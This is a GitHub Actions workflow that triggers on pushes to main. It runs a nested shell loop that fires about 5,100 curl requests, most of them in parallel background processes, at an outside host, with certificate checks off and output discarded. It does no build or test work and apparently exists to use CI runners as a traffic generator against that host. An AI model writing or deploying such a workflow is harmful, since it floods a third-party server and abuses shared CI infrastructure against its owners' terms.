name: Loop 100 Times d4231159-b183-4c3c-87b9-aa67c0c403c9

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times d4231159-b183-4c3c-87b9-aa67c0c403c9
        id: loop_step
        run: |
          counter=0
          max_loops=50
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks https://v6.zero.bs 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks https://v6.zero.bs 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




